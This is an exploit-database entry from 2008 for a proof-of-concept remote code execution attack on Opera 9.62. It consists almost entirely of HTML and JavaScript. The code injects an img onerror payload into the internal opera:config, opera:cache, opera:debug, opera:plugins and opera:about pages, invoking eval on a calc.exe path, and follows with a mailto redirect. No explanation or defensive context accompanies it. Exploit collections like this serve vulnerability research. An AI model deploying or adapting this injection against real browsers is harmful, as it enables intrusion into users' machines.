Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC

2008-10-31T00:00:00
ID SSV:9856
Type seebug
Reporter Root
Modified 2008-10-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>